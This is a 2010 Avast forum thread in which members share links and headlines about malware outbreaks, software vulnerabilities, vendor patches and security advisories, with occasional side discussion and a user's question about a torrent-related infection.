http://forum.avast.com/index.php?topic=28748.msg544394#msg544394 (http://forum.avast.com/index.php?topic=28748.msg544394#msg544394)
-
http://forum.avast.com/index.php?topic=28748.msg544394#msg544394 (http://forum.avast.com/index.php?topic=28748.msg544394#msg544394)
thanks ;)
(just adding: this is about web places and security >>> a must read for many ;) )
-
Banking trojan ZeuS homes in on SMS-TAN process
http://securityblog.s21sec.com/2010/09/zeus-mitmo-man-in-mobile-i.html
asyn
-
Here is more on that
Zeus banking Trojan targets mobile phones too
http://news.cnet.com/8301-27080_3-20017762-245.html
-
DSL, Now Offering Speeds of 700 Mbps
http://gigaom.com/2010/09/22/huawei-takes-copper-to-the-limit-with-700-mbps-dsl/
So there is hope for you David ..... ;D
-
Why You Should Use Ad Block Extensions, Even if You Don't Block Ads
Whilst not a warning, more of general security information, http://lifehacker.com/5649025/why-you-should-use-adblock-plus-even-if-you-dont-block-ads (http://lifehacker.com/5649025/why-you-should-use-adblock-plus-even-if-you-dont-block-ads)
-
Why You Should Use Ad Block Extensions, Even if You Don't Block Ads
Well, that's not really new, but for sure a good reminder... ;)
asyn
-
Here's a new one ;D
How about an iphone 4B ;D ;D ;D
No thanks...
I had two of these...
So it appears to be from facebook, but is is from a random email address...
And the site is not what it seems...(plus malzilla detects LOADS of redirects...)
Not to mention that it is just wrong...
This just goes to show how careful you have to be with emails...
EDIT:
I win :)
http://www.virustotal.com/url-scan/report.html?id=8772a62f8c506df23373d46c0ba6ca6b-1285693742
http://www.virustotal.com/url-scan/report.html?id=306d0c140d84b573fa41af765a293fab-1285694494
-
Why You Should Use Ad Block Extensions, Even if You Don't Block Ads
Its simple to block Ads in IE Adblock for Internet Explorer
Simple Adblock is an adblocker extension for Internet Explorer designed to make adblocking easy. Simple Adblock blocks all kinds of advertising from websites including flash ads, banner ads, rich media, slide-ins and fly-ins.
http://simple-adblock.com
Also use hpHosts HOSTS file for additional blocking.
-
Out-of-band security update from Microsoft
http://www.norman.com/security_center/security_center_archive/2010/92367/en
-
Out-of-band security update from Microsoft
http://www.norman.com/security_center/security_center_archive/2010/92367/en
Related info here: http://forum.avast.com/index.php?topic=63221.msg542172#msg542172
asyn
-
More Zeus
Zeus botnets' Achilles' Heel makes infiltration easy
http://www.theregister.co.uk/2010/09/27/zeus_botnet_hijacking/
More Stuxnet
Stuxnet worm can reinfect PCs even after disinfection
http://www.theregister.co.uk/2010/09/28/stuxnet_resurrection_ability/
and something new
Researchers up evilness ante with GPU-assisted malware
http://www.theregister.co.uk/2010/09/28/gpu_assisted_malware/
-
Watch out, someone may steal your internet line ..... :o
Copper prices push cable thefts to new high
http://www.theregister.co.uk/2010/09/28/rail_copper_thefts/
-
Watch out, someone may steal your internet line ..... :o
Copper prices push cable thefts to new high
http://www.theregister.co.uk/2010/09/28/rail_copper_thefts/
No problem, I'm on fibre optics... ;D
asyn
-
Watch out, someone may steal your internet line ..... :o
Copper prices push cable thefts to new high
http://www.theregister.co.uk/2010/09/28/rail_copper_thefts/
We had a bunch of guys that where stealing the batteries out of the relay boxes. >:(
-
not a warning, but a security tip (not sure if it fits in this thread):
'Rickroll' protection hits Firefox in add-on form
http://news.cnet.com/8301-27076_3-20017569-248.html
https://addons.mozilla.org/en-US/firefox/addon/230353/
("This add-on has not been reviewed by Mozilla.")
avast! already protects against some "Rick Roll"s - they are detected as HTML:Agent-X[Joke] ;)
-
Out-of-band security update from Microsoft (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/92367/en
Update 1 October 2010
The security update is now available also as a Windows Update as announced above.
-
Orkut Worm spreading through XSS loophole
http://www.norman.com/security_center/blog/nirmal_and_jyotinder/92415/en
-
Critical hole in Reader: Adobe accelerates patch day
http://www.adobe.com/support/security/bulletins/apsb10-21.html
asyn
-
Critical vulnerability in Adobe Flash Player, Adobe Reader and Acrobat (UPDATED)
http://www.norman.com/security_center/security_center_archive/2010/91954/en
-
Stuxnet worm slithers into China, heralds alien invasion
http://www.theregister.co.uk/2010/10/01/stuxnet_china_analysis/
-
MySQL update addresses DoS vulnerability
http://secunia.com/advisories/41716/
http://dev.mysql.com/doc/refman/5.1/en/news-5-1-51.html
asyn
-
Critical hole in Reader: Adobe accelerates patch day
http://www.adobe.com/support/security/bulletins/apsb10-21.html
asyn
Adobe patches 23 holes in Reader and Acrobat
http://www.h-online.com/security/news/item/Adobe-patches-23-holes-in-Reader-and-Acrobat-1102416.html
asyn
-
Hello community :D
I joined the forums because some minutes ago while downloading a book torrent a friend of mine suggested, this message appeared/appears, in an infinite loop.
After the first few times of it reappearing, I deleted everything that on first glance is related to the particular torrent and ended the process of utorrent, but I am afraid of it having managed to 'dig' deeper in the PC.
Anyway, I have 2 questions.
Should I worry, and why I cannot get rid of the message?
Cheers!
(http://www.imagehosting.gr/out.php/i1461276_utorrent.jpg)
(p.s. I have tried all actions except for 'ignore' and the message still reappears)
-
posted the wrong place
start a new topic here if you have virus problems http://forum.avast.com/index.php?board=4.0
-
Hello community :D
I joined the forums because some minutes ago while downloading a book torrent a friend of mine suggested, this message appeared/appears, in an infinite loop.
After the first few times of it reappearing, I deleted everything that on first glance is related to the particular torrent and ended the process of utorrent, but I am afraid of it having managed to 'dig' deeper in the PC.
Anyway, I have 2 questions.
Should I worry, and why I cannot get rid of the message?
Cheers!
(p.s. I have tried all actions except for 'ignore' and the message still reappears)
Most torrent files have malware!
-
posted the wrong place
start a new topic here if you have virus problems http://forum.avast.com/index.php?board=4.0
is it? It's not the virus per se (for now) I have the problem with. It's the message that I cannot get rid off and don't know why.
-
posted the wrong place
start a new topic here if you have virus problems http://forum.avast.com/index.php?board=4.0
is it? It's not the virus per se (for now) I have the problem with. It's the message that I cannot get rid off and don't know why.
That is because your system is infected with malware! ::)
-
Critical hole in Reader: Adobe accelerates patch day
http://www.adobe.com/support/security/bulletins/apsb10-21.html
asyn
Adobe patches 23 holes in Reader and Acrobat
http://www.h-online.com/security/news/item/Adobe-patches-23-holes-in-Reader-and-Acrobat-1102416.html
asyn
Will there be an update for Foxit Reader? Does the problem also affect it?
-
Will there be an update for Foxit Reader? Does the problem also affect it?
An update does not appear to be necessary. According to Secunia, the current version, Foxit Reader 4.2.0.928, has no public, unpatched vulnerabilities.
http://secunia.com/advisories/product/30682/
-
FTP-Server at risk
Multiple Vendors libc/glob(3) resource exhaustion (+0day remote ftpd-anon)
http://securityreason.com/securityalert/7822
asyn
-
SORBS.NET - email RBL issues
http://isc.sans.edu/diary.html?storyid=9685
asyn
-
Microsoft Security Bulletins advance notification
http://norman.com/security_center/security_center_archive/2010/80066/en
-
Spam blacklist snafu prompts global gnashing of teeth (Legit IPs blocked in SORBS cockup)
http://www.theregister.co.uk/2010/10/07/sorbs_cockup/
Many email users around the world have been unable to send messages because of ongoing technical problems with a popular service designed to prevent spam from reaching its intended destination.
-
Sick PCs should be banned from the net says Microsoft
http://www.bbc.co.uk/news/technology-11483008
-
Sick PCs should be banned from the net says Microsoft
http://www.bbc.co.uk/news/technology-11483008
What an absolute load of horse droppings, even if it is a justifiable statement. MS could/should have done more on OS security in the first place, as it is their holes in security that got most people into this mess in the first place.
How is this going top be achieved as the only real way of defining what is a sick PC is to do a test when they connect. Not that someone doing an unknown/unauthorised probe/scan of your system (privacy/morally/ethically) smacks of big brother and very dubious.
How would one site know not to do this test, etc. without a massive database, yet another privacy issue, or something held at system level that they access to block access, yet more privacy issues. Both of which would I'm sure be targets.
Having blocked so called sick PCs and who determines if the patient has a cold or a terminal illness; how are they to get clean without access to the internet (chicken and egg again). I sometimes if the people spouting this rubbish have too much so called intelligence and zero common sense.
-
What an absolute load of horse droppings, even if it is a justifiable statement. MS could/should have done more on OS security in the first place, as it is their holes in security that got most people into this mess in the first place.
I wonder how much infections are actually MS's fault and not third-party software.
Adobe Reader 9, for example, has MORE vulnerabilities than Windows 7. Yes...a PDF reader has more vulnerabilities than an entire OS ::)
-
and the jerks developing malware don't matter I suppose, if the door is open, then come in ??? is that it?
-
Sick PCs should be banned from the net says Microsoft
http://www.bbc.co.uk/news/technology-11483008
Here's the link to the PDF called
"Collective Defense - Applying Public Health Models to the Internet"
http://go.microsoft.com/?linkid=9746317
asyn
-
Oracle Critical Patch Update Pre-Release Announcement
http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html
Oracle Java SE and Java for Business Critical Patch Update Pre-Release Announcement
http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html
asyn
-
MS planning Patch Tuesday whopper: 16 bulletins, 49 vulnerabilities
http://www.zdnet.com/blog/security/ms-planning-patch-tuesday-whopper-16-bulletins-49-vulnerabilities/7433
-
Manipulated card terminals at US ALDI branches
http://www.aldifoods.com/us/media/company/company/Press_Release.pdf
http://www.computerworld.com/s/article/9189982/Aldi_data_breach_shows_payment_terminal_holes
asyn
-
Malware forces Firefox to save passwords
http://www.theregister.co.uk/2010/10/11/firefox_password_malware/
-
WinPatrol blames McAfee for lost business ('False alarm scared off customers')
http://www.theregister.co.uk/2010/10/11/winpatrol_false_positive_mcafee/
-
Die-hard bug bytes Linux kernel for second time (Get your root access here)
http://www.theregister.co.uk/2010/09/15/linux_kernel_regression_bug/
-
WinPatrol blames McAfee for lost business ('False alarm scared off customers')
http://www.theregister.co.uk/2010/10/11/winpatrol_false_positive_mcafee/
Also in:
Interesting Software and System News on October 10, 2010, 11:27:38 AM
http://forum.avast.com/index.php?topic=19387.msg548151#msg548151
-
Most probably it was already posted. I have no patience of searching more than once in the forum ;D
Adobe will be released with an in-bound sandbox to avoid exploits.
The sandbox will be on by default. If an exploit -- which is a mechanism developed by an attacker in order to deliver malicious software to a computer -- attacks the application, it won't be able to get out of the sandbox, Arkin said.
http://www.infoworld.com/d/security-central/adobe-more-secure-version-reader-out-year-end-500?source=rss_applications
-
Most probably it was already posted. I have no patience of searching more than once in the forum ;D
Adobe will be released with an in-bound sandbox to avoid exploits.
The sandbox will be on by default. If an exploit -- which is a mechanism developed by an attacker in order to deliver malicious software to a computer -- attacks the application, it won't be able to get out of the sandbox, Arkin said.
http://www.infoworld.com/d/security-central/adobe-more-secure-version-reader-out-year-end-500?source=rss_applications
okay... hadn't heard about it yet, good that you posted it. They'll probably release a beta soon then... will check on Adobe labs.
-
Most probably it was already posted. I have no patience of searching more than once in the forum ;D
Adobe will be released with an in-bound sandbox to avoid exploits.
Inside Adobe Reader Protected Mode ;)
http://forum.avast.com/index.php?topic=63221.msg547407#msg547407
asyn
-
Thanks Asyn... Couldn't find at first.
-
Thanks Asyn... Couldn't find at first.
No problem, Tech...
asyn
-
Oracle Critical Patch Update Pre-Release Announcement
http://www.oracle.com/technetwork/topics/security/cpuoct2010-175626.html
Oracle Java SE and Java for Business Critical Patch Update Pre-Release Announcement
http://www.oracle.com/technetwork/topics/security/javacpuoct2010-176258.html
asyn
October 2010 and Java Critical Patch Updates Released
http://blogs.oracle.com/security/2010/10/october_2010_and_java_critical.html
asyn
-
Vulnerabilities in Xpdf affect several open source products
https://rhn.redhat.com/errata/RHSA-2010-0751.html
asyn
-
Microsoft's Security Intelligence Report (SIR) #9
http://www.microsoft.com/security/sir/default.aspx
asyn
-
Facebook introduces one time passwords for insecure computers
http://blog.facebook.com/blog.php?post=436800707130
asyn
-
Security update for BlackBerry server
http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB24547
asyn
-
Google: Phishing URLs and XML Notifications
http://googleonlinesecurity.blogspot.com/2010/10/phishing-urls-and-xml-notifications.html
asyn
-
Microsoft turns on reputation check for IE9
http://www.itnews.com.au/News/235379,microsoft-turns-on-reputation-check-for-ie9.aspx
-
Ruby on Rails update closes vulnerability
http://www.h-online.com/security/news/item/Ruby-on-Rails-update-closes-vulnerability-1108621.html
-
Microsoft Removed 6.5 Million Bots From Windows Machines In Q2
http://www.darkreading.com/vulnerability_management/security/vulnerabilities/showArticle.jhtml?articleID=227701285
-
Microsoft confirms Russian pill-pusher attack on its network ( Is there a Linux admin in the house? )
http://www.theregister.co.uk/2010/10/14/microsoft_confirms_ip_hijack/
Ruskie gang hijacks Microsoft network to push penis pills ( Redmond abused as scammers' IP bitch )
http://www.theregister.co.uk/2010/10/12/microsoft_ips_hijacked/
-
Espionage app updated for Windows phones ( Next destination: Android )
http://www.theregister.co.uk/2010/10/15/smartphone_espionage_suite/
-
ZeuS baddies copy Conficker tactics ( Malware phone-home ploy gets recycled )
http://www.theregister.co.uk/2010/10/15/zeus_conficker_assault/
Look Out, Licat!
http://countermeasures.trendmicro.eu/look-out-licat/
VirusTotal
http://www.virustotal.com/file-scan/report.html?id=b3e3b3d389d48ae056845b8223402e1d27c8950eadaa7ffecaebeda93af73a03-1287136181
ThreatExpert
http://www.threatexpert.com/report.aspx?md5=1e940baeb962042a6628f81c93aaecd1
-
Stealth malware steals, imitates social behavior
http://www.msnbc.msn.com/id/39691794/ns/technology_and_science-security/
Also read,
Malware Aimed at Social Networks May Steal Your Reality
http://www.pcworld.com/article/207659/malware_aimed_at_social_networks_may_steal_your_reality.html?tk=hp_new
-
Fake Stuxnet removal tool will kill your PC
http://www.sync-blog.com/sync/2010/10/stuxnet-removal-tool-is-malware-too.html
It's shame that avast! is not listed under suggestions...
-
Apple Fixes Bugs in Remote App 2.0.1 Update
http://www.pcworld.com/businesscenter/article/207976/apple_fixes_bugs_in_remote_app_201_update.html
-
Apple Fixes Bugs in Remote App 2.0.1 Update
http://www.pcworld.com/businesscenter/article/207976/apple_fixes_bugs_in_remote_app_201_update.html
Can you post this under the new Smart Phones Update thread: http://forum.avast.com/index.php?topic=65103.0 (http://forum.avast.com/index.php?topic=65103.0). Thank you.
-
Hi Safesurf,
I've just realised that you've created such a nice thread!
I'll post this right away ;D
-
Hi Safesurf,
I've just realised that you've created such a nice thread!
I'll post this right away ;D
Thank you. :)
-
***
From the Wall Street Journal:
Report: Facebook apps transmitted personal info
"The Wall Street Journal is reporting that 10 popular Facebook applications have been transmitting users' personal identifying information to dozens of advertising and Internet tracking companies."
http://my.earthlink.net/article/top?guid=20101018/2b65b90d-a821-441e-939e-b119ebb89c03
***
-
Microsoft: ‘Unprecedented Wave of Java Exploitation’
http://krebsonsecurity.com/2010/10/microsoft-a-tidal-wave-of-java-exploitation/
asyn
-
Security problems in media players
http://www.h-online.com/security/news/item/Security-problems-in-media-players-1109782.html
asyn
-
The GNU C library dynamic linker expands $ORIGIN in setuid library search path
http://seclists.org/fulldisclosure/2010/Oct/257
asyn
-
New malware technique targets intrusion-prevention systems
http://www.networkworld.com/news/2010/101810-malware-targets-ips.html?t51hb
-
Fake Twitter homepages serving malware
http://www.net-security.org/malware_news.php?id=1498
-
Microsoft nukes Zeus malware from 275,000 Windows machines
Microsoft is claiming major success at cleaning the notorious Zeus crimeware trojan from infected Windows machines.
One week after adding detections into its malicious software removal tool, Microsoft said it nuked Zeus (also called Zbot) 281,491 times from 274,873 computers.
http://www.zdnet.com/blog/security/microsoft-nukes-zeus-malware-from-275000-windows-machines/7481?tag=nl.e589
-
RealPlayer Security Updates Published (http://boelectronic.blogspot.com/2010/10/realplayer-security-updates-published.html)
Facebook Privacy Breach: Users' Info Leaked To Advertising, Tracking Firms (http://boelectronic.blogspot.com/2010/10/facebook-privacy-breach-users-info.html)
-
Trojan trouble at Lenovo
http://www.h-online.com/security/news/item/Trojan-trouble-at-Lenovo-1110581.html
asyn
-
Hole in Linux kernel provides root rights
http://www.vsecurity.com/resources/advisory/20101019-1/
asyn
-
WoW Patch Brings Out the Malware Trolls
http://blog.webroot.com/2010/10/20/wow-patch-brings-out-the-malware-trolls
-
Hackers subvert Firefox security warnings to sling scareware
http://www.theregister.co.uk/2010/10/20/scareware_scumbags_subvert_firefox_security_warnings/
-
RealPlayer Security Updates Published (http://boelectronic.blogspot.com/2010/10/realplayer-security-updates-published.html)
Strange how there are no updates for the latest version 1.1.5 :S
-
Critical vulnerability in Adobe Shockwave Player - no update available
http://www.norman.com/security_center/security_center_archive/2010/128624/en
A critical vulnerability has been identified in Adobe Shockwave Player 11.5.8.612 and earlier versions. Details about the vulnerability has been published on the Internet, and malware that utilizes this may be expected to appear.
-
Critical vulnerability in Adobe Shockwave Player - no update available
http://www.norman.com/security_center/security_center_archive/2010/128624/en
A critical vulnerability has been identified in Adobe Shockwave Player 11.5.8.612 and earlier versions. Details about the vulnerability has been published on the Internet, and malware that utilizes this may be expected to appear.
More on this:
http://www.exploit-db.com/exploits/15296/
http://blogs.adobe.com/psirt/2010/10/security-advisory-for-adobe-shockwave-player-apsa10-04.html
asyn
-
Apple releases Java security updates
http://www.h-online.com/security/news/item/Apple-releases-Java-security-updates-1122472.html
asyn
-
New malware technique targets intrusion-prevention systems
http://www.networkworld.com/news/2010/101810-malware-targets-ips.html?t51hb
Alarms for online networks largely useless
http://www.h-online.com/security/news/item/Alarms-for-online-networks-largely-useless-1123028.html
asyn
-
Pidgin 2.7.4 closes DoS vulnerability
http://pidgin.im/news/security/?id=48
http://developer.pidgin.im/wiki/ChangeLog
asyn
-
CompTIA - upcoming discussion on security culprits and costs
http://www.scmagazineus.com/costs-and-causes-of-data-loss-incidents-to-be-discussed/article/181252/
-
Are security products losing the battle?
http://www.norman.com/security_center/security_center_archive/2010/128626/no
-
Are security products losing the battle?
http://www.norman.com/security_center/security_center_archive/2010/128626/no
Can you please post a link to test result too? (from NSS), I followed the link posted in NSSLab and it open a blank page
-
Top right corner, click the " FREE REPORT " should give you a pdf.file
http://www.nsslabs.com/research/endpoint-security/anti-malware/consumer-anti-malware-products:-group-test-report-q3-2010.html
-
Are security products losing the battle?
http://www.norman.com/security_center/security_center_archive/2010/128626/no
Being discussing at Wilders: http://www.wilderssecurity.com/showthread.php?t=284754
And Comodo: https://forums.comodo.com/empty-t63917.0.html;topicseen
-
Top right corner, click the " FREE REPORT " should give you a pdf.file
http://www.nsslabs.com/research/endpoint-security/anti-malware/consumer-anti-malware-products:-group-test-report-q3-2010.html
This time link worked (http://forum.qip.ru/images/smilies/wink.gif)
I like AVG Result (http://forum.qip.ru/images/smilies/spiteful.gif)
-
Siemens Stuxnet patch does not provide sufficient protection
http://www.h-online.com/security/news/item/Siemens-Stuxnet-patch-does-not-provide-sufficient-protection-1123815.html
asyn
-
Facebook proposes encryption to stop third party data thieves
http://www.theinquirer.net/inquirer/news/1810100/facebook-proposes-encryption-stop-party-theives
-
Are security products losing the battle?
http://www.norman.com/security_center/security_center_archive/2010/128626/no
Being discussing at Wilders: http://www.wilderssecurity.com/showthread.php?t=284754
And Comodo: https://forums.comodo.com/empty-t63917.0.html;topicseen
Round here everyone is not losing the battle primarily because they have security products ;D
It wasn't always like this. infected computers still come in through the front door from the wild.
mostly avast users now, run a real-time antivirus as resident with other security products.
-
Kaspersky Anti-Virus cripples Servers
http://www.h-online.com/security/news/item/Kaspersky-Anti-Virus-cripples-Servers-1124659.html
asyn
-
Iranian Cyber Army Moves Into Botnets
http://www.pcworld.com/businesscenter/article/208670/iranian_cyber_army_moves_into_botnets.html
-
Reports: Click fraud, malware increasing
http://www.bizreport.com/2010/10/reports-click-fraud-malware-increasing.html
-
SpyEye v. ZeuS Rivalry Ends in Quiet Merger
http://krebsonsecurity.com/2010/10/spyeye-v-zeus-rivalry-ends-in-quiet-merger/
asyn
-
Critical vulnerability in Firefox 3.5 and Firefox 3.6
http://blog.mozilla.com/security/2010/10/26/critical-vulnerability-in-firefox-3-5-and-firefox-3-6/
https://bugzilla.mozilla.org/show_bug.cgi?id=607222 [dev rights needed]
http://blog.trendmicro.com/firefox-zero-day-found-in-compromised-nobel-peace-prize-website/
asyn
-
What's the riskiest country to visit -- on the Web?
http://technolog.msnbc.msn.com/_news/2010/10/26/5355098-whats-the-riskiest-country-to-visit-on-the-web
-
The Rise of the Small Botnet
Smaller botnets are cheaper and easier to build out and operate, and criminals have already realized that large-scale botnets attract unwanted attention
http://www.securityweek.com/rise-small-botnet
-
Critical vulnerability in Firefox 3.5 and Firefox 3.6
http://blog.mozilla.com/security/2010/10/26/critical-vulnerability-in-firefox-3-5-and-firefox-3-6/
https://bugzilla.mozilla.org/show_bug.cgi?id=607222 [dev rights needed]
http://blog.trendmicro.com/firefox-zero-day-found-in-compromised-nobel-peace-prize-website/
asyn
Updates available..!! That was fast...!! :)
https://developer.mozilla.org/devnews/index.php/2010/10/27/firefox-3-6-12-and-3-5-15-security-updates-now-available/
https://developer.mozilla.org/devnews/index.php/2010/10/27/thunderbird-3-1-6-and-3-0-10-security-updates-now-available/
asyn
-
Trojan Horse OSX/Koobface.A Affects Mac OS X
Koobface Variant Spreads via Facebook, Twitter and More
http://blog.intego.com/2010/10/27/intego-security-memo-trojan-horse-osxkoobface-a-affects-mac-os-x-mac-koobface-variant-spreads-via-facebook-twitter-and-more/
http://www.securemac.com/boonana-bulletin.php
asyn
-
Security problems in media players
http://www.h-online.com/security/news/item/Security-problems-in-media-players-1109782.html
asyn
Nullsoft closes holes in Winamp
http://forums.winamp.com/showthread.php?t=322995
http://secunia.com/secunia_research/2010-95/
asyn
-
A new vulnerability in Adobe products:
http://www.adobe.com/support/security/advisories/apsa10-05.html
-
CiscoWorks Common Services Arbitrary Code Execution Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20101027-cs.shtml
asyn
-
"Your are infected with Bredolab" Message Problem
http://norman.com/security_center/blog/righard_zwienenberg/129332/en-us
Hey, your computer is infected!
http://norman.com/security_center/security_center_archive/2010/129405/en-us
Undead Bredolab zombie network lashes out from the grave (Someone's still pulling the strings)
http://www.theregister.co.uk/2010/10/29/bredolab_botnet_death_throes/
-
***
Using Wi-Fi? Firesheep may endanger your security
"Most internet users hear -- and dismiss -- warnings about security problems on open Wi-Fi networks. The advent of Firesheep, coupled with the booming popularity of account-based online services such as Twitter, means that no one can afford to continue to ignore online security."
http://edition.cnn.com/2010/TECH/mobile/11/01/firesheep.wifi.security/
***
-
Spontaneous worldwide reboot of Check Point appliances
http://yurisk.info/2010/10/31/the-d-day-for-checkpoint-utm-1-edge-appliances-happened-today-reboots-are-reported-all-over-the-world/
http://www.cpug.org/forums/check-point-utm-1-edge-appliances/14606-all-edge-firewalls-rebooted-10-30-2010-8-58-p-m.html
asyn
-
Hackers tap SCADA vuln search engine
http://www.theregister.co.uk/2010/11/02/scada_search_engine_warning/
-
Firesheep, Idiocy, Ethics and the Law
http://blog.eset.com/2010/11/02/firesheep-idiocy-ethics-and-the-law
-
Sophos debuts freebie anti-virus scanner for Macs (Sweat trickles down fanboi foreheads)
http://www.theregister.co.uk/2010/11/02/sophos_mac_anti_virus/
Shopos Anti-Virus for Mac home edition
http://www.sophos.com/products/free-tools/free-mac-anti-virus/tech-specs.html
Forum
http://openforum.sophos.com/t5/Sophos-Anti-Virus-for-Mac-Home/bd-p/FTT_MAC_MAGNET
Sophos unveils free antivirus software for the Mac
http://news.cnet.com/8301-27080_3-20021424-245.html
-
New multi-platform infector:
Trojan:Java/Boonana, is written in Java which gives it cross platform capability infecting Windows, Mac and Linux users.
http://blogs.technet.com/b/mmpc/archive/2010/11/03/its-not-koobface-new-multi-platform-infector.aspx
-
***
Using Wi-Fi? Firesheep may endanger your security
"Most internet users hear -- and dismiss -- warnings about security problems on open Wi-Fi networks. The advent of Firesheep, coupled with the booming popularity of account-based online services such as Twitter, means that no one can afford to continue to ignore online security."
http://edition.cnn.com/2010/TECH/mobile/11/01/firesheep.wifi.security/
***
Squash FireSheep with FireShepherd:
http://notendur.hi.is/~gas15/FireShepherd/
http://www.downloadsquad.com/2010/10/29/fight-firesheep-with-fireshepherd/
-
Adobe, Adobe, Adobe... ::)
http://blogs.adobe.com/psirt/2010/11/potential-issue-in-adobe-reader.html
http://lists.grok.org.uk/pipermail/full-disclosure/2010-November/077255.html
http://secunia.com/advisories/42112/
-
Attackers Now Using Honeypots to Trap Researchers
http://threatpost.com/en_us/blogs/attackers-now-using-honeypots-trap-researchers-110410?utm_source=Newsletter_110510&utm_medium=Email+Marketing&utm_campaign=Newsletter&CID=&CID=
-
Attackers Now Using Honeypots to Trap Researchers
Also read here: http://forum.avast.com/index.php?topic=63221.msg556130#msg556130
-
Attackers Now Using Honeypots to Trap Researchers
Also read here: http://forum.avast.com/index.php?topic=63221.msg556130#msg556130
Thanks, don't knew about it.
-
Attackers Now Using Honeypots to Trap Researchers
Also read here: http://forum.avast.com/index.php?topic=63221.msg556130#msg556130
I always knew that Honeypots where sticky and hard to get out of. ;D
-
avast! 5 related one
http://secunia.com/advisories/42134/
-
Viruses lead security concerns of small and midsize business
http://www.informationweek.com/news/security/vulnerabilities/showArticle.jhtml?articleID=228200171
(not sure if the report has already been posted)
-
avast! 5 related one
http://secunia.com/advisories/42134/
Well it is rated as Not Critical and more importantly, talks of 'malicious local users' so you have to have some responsibility over physical access to your system.
See image, click to expand.
It says this is in the avast! Internet Security product, so I don't know if "aswtdi.sys" is also across the 5.0.677 product range.
-
Microsoft warns of zero-day hole in Internet Explorer
https://www.microsoft.com/technet/security/advisory/2458511.mspx
http://www.symantec.com/connect/blogs/new-ie-0-day-used-targeted-attacks
http://blogs.technet.com/b/msrc/archive/2010/11/02/microsoft-releases-security-advisory-2458511.aspx
http://blogs.technet.com/b/srd/archive/2010/11/03/dep-emet-protect-against-attacks-on-the-latest-internet-explorer-vulnerability.aspx
http://support.microsoft.com/kb/2458511/en-us
-
Microsoft warns of zero-day hole in Internet Explorer
Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit
http://www.exploit-db.com/exploits/15421/
-
Microsoft warns of zero-day hole in Internet Explorer
Internet Explorer 6, 7, 8 Memory Corruption 0day Exploit
http://www.exploit-db.com/exploits/15421/
Firefox is not as safe as you assume: ;)
Mozilla patches 12 Firefox bugs
http://news.techworld.com/security/3244954/mozilla-patches-12-firefox-bugs
-
Did anyone say that it was ???
I see no point in posting about a vulnerability that has been patched, when Asyn is posting about a 0day vulnerability/exploit in IE.
You really do get protective about IE when someone posts a vulnerability, strange considering that this is the SECURITY WARNINGS & Notices topic. Almost like you built it, when the whole idea of this topic is to alert about security warnings and notices wherever they might be.
-
I guess those still running on XP need to be carefull. ;D
Those running Windows 7 64bit and IE9 are a bit safer and have a better browser option:
IE9, FF4 Beta In Real-World Benchmark
http://www.lucidchart.com/blog/2010/09/16/ie9-ff4-beta-in-real-world-benchmark
Google Chrome on my XP Pro system is very good. ;)
-
You are at it again, when are you going to learn, this has nothing to do with the original IE 0day post by Aysn you quoted and my follow up.
Vista is also effected, but I guess you didn't read all of the information Asyn posted or you would have done as I did and post the Mitigating Factors that limit the potential of this 0day exploit; rather than trying to deflect security notices on IE to other areas as is very common for you.
I don't really care if people are using win7 64bit (though some win7 users are vulnerable if they aren't using IE9 beta) and or IE 9 beta as they aren't mentioned in the 0day exploit that was posted.
-
Burma hit by massive net attack ahead of election
An ongoing computer attack has knocked Burma off the internet, just days ahead of its first election in 20 years.
http://www.bbc.co.uk/news/technology-11693214
-
Microsoft warns of zero-day hole in Internet Explorer
https://www.microsoft.com/technet/security/advisory/2458511.mspx
http://www.symantec.com/connect/blogs/new-ie-0-day-used-targeted-attacks
http://blogs.technet.com/b/msrc/archive/2010/11/02/microsoft-releases-security-advisory-2458511.aspx
http://blogs.technet.com/b/srd/archive/2010/11/03/dep-emet-protect-against-attacks-on-the-latest-internet-explorer-vulnerability.aspx
http://support.microsoft.com/kb/2458511/en-us
Heads up... 0-day in an exploit kit
http://thompson.blog.avg.com/2010/11/heads-up-0-day-in-an-exploit-kit.html
-
SSL for Hotmail blocks Windows Live connections
http://windowsteamblog.com/windows_live/b/windowslive/archive/2010/11/09/hotmail-security-improves-with-full-session-https-encryption.aspx
-
Critical Hole in Mac OS X 10.5.x
http://www.coresecurity.com/content/Apple-OSX-ATSServer-CharStrings-Sign-Mismatch
-
Hidden second Wi-Fi network with the Thomson TWG870U router
http://www.norman.com/security_center/blog/righard_zwienenberg/129786/en
-
Microsoft warns of zero-day hole in Internet Explorer
https://www.microsoft.com/technet/security/advisory/2458511.mspx
http://www.symantec.com/connect/blogs/new-ie-0-day-used-targeted-attacks
http://blogs.technet.com/b/msrc/archive/2010/11/02/microsoft-releases-security-advisory-2458511.aspx
http://blogs.technet.com/b/srd/archive/2010/11/03/dep-emet-protect-against-attacks-on-the-latest-internet-explorer-vulnerability.aspx
http://support.microsoft.com/kb/2458511/en-us
Heads up... 0-day in an exploit kit
http://thompson.blog.avg.com/2010/11/heads-up-0-day-in-an-exploit-kit.html
Amnesty International Hong Kong Website Injected With Latest Internet Explorer 0-day
http://community.websense.com/blogs/securitylabs/archive/2010/11/10/Amnesty-International-Hong-Kong-Website-Injected-With-Latest-Internet-Explorer-0_2D00_day-.aspx
-
How do criminals use Facebook? Let us count the ways
http://www.sync-blog.com/sync/2010/11/how-do-criminals-use-facebook-let-us-count-the-ways.html
-
Stuxnet: A Breakthrough
http://www.symantec.com/connect/blogs/stuxnet-breakthrough
-
Global spam e-mail drops after hacker arrests
http://www.bbc.co.uk/news/technology-11757347
-
How the TLD4 rootkit gets around driver signing policy on a 64-bit machine
http://sunbeltblog.blogspot.com/2010/11/how-tld4-rootkit-gets-around-driver.html
-
Red Hat warns of hole in OpenSSL
http://rhn.redhat.com/errata/RHSA-2010-0888.html
http://openssl.org/news/secadv_20101116.txt
-
Adobe, Adobe, Adobe... ::)
http://blogs.adobe.com/psirt/2010/11/potential-issue-in-adobe-reader.html
http://lists.grok.org.uk/pipermail/full-disclosure/2010-November/077255.html
http://secunia.com/advisories/42112/
Update for Adobe Reader fixes 19 holes
http://www.adobe.com/support/security/bulletins/apsb10-28.html
-
Adobe, Adobe, Adobe... ::)
http://blogs.adobe.com/psirt/2010/11/potential-issue-in-adobe-reader.html
http://lists.grok.org.uk/pipermail/full-disclosure/2010-November/077255.html
